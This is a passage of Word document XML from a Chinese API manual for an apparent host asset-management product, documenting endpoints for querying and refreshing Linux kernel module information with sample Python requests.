              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7430B948" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71E96239" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32B413A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>moduleName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41622E21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E9080A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38A375C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="484B5710" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="216A213D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F89F6CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ACE07E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D127625" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="437AD533" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D57D0C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF09B68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3586EB6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14029E2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B03919E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A51EFD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="146B4E5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73AA539F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6856F50B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D3106DE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02F64673" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CF95A8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4513DCF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="260FF4DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="133ECAE5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CE14AE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>depends</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A03CBCD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EAE3464" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C1CADA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>其依赖的模块进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61F8368A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AFA63E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>holders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22D72495" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32A31A42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36331D4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>依赖其的内核模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A5139FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>内核模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692A1099" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kernelmodule_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/assets/kernelmodule/linux?moduleName=ahci&amp;path=/lib/modules/4.8.0-36-generic/kernel/drivers/ata/ahci.ko&amp;version=3.0,2.21,1.4" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>moduleName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>': '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ahci</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', 'path': '/lib/modules/4.8.0-36-generic/kernel/drivers/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ahci.ko</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', 'version': '3.0,2.21,1.4'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCBA330" w14:textId="128EB1B3" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "身份认证" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>身份认证</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5840279A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc115166141"/>
      <w:bookmarkStart w:id="134" w:name="内核模块信息扫描"/>
      <w:bookmarkEnd w:id="132"/>
      <w:r>
        <w:t>内核模块信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w14:paraId="303C1D82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求内核模块信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D44C08C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B76CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kernelmodule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64297C4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26926A0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FAFA31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D0D9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kernelmodule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DFCB0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7D8018" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A818C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB27BE"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58C06642"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7760731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81FE1B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A223CD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E84A90B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4255F9E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7BB78CB1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A2B722C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FC7ECE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D861D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F2E3BC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B9D4EDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>内核模块信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE7A27E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refresh(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kernelmodule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D51A1AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc115166142"/>
      <w:bookmarkStart w:id="136" w:name="内核模块信息查询扫描状态"/>
      <w:bookmarkEnd w:id="134"/>
      <w:r>
        <w:t>内核模块信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="0FB444E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询内核模块信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C3868B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc115166143"/>
      <w:bookmarkStart w:id="138" w:name="安装包信息"/>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="136"/>
      <w:r>
        <w:t>安装包信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="150D4051" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38691148" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的安装包信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8D74A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F80D73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4728A6E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
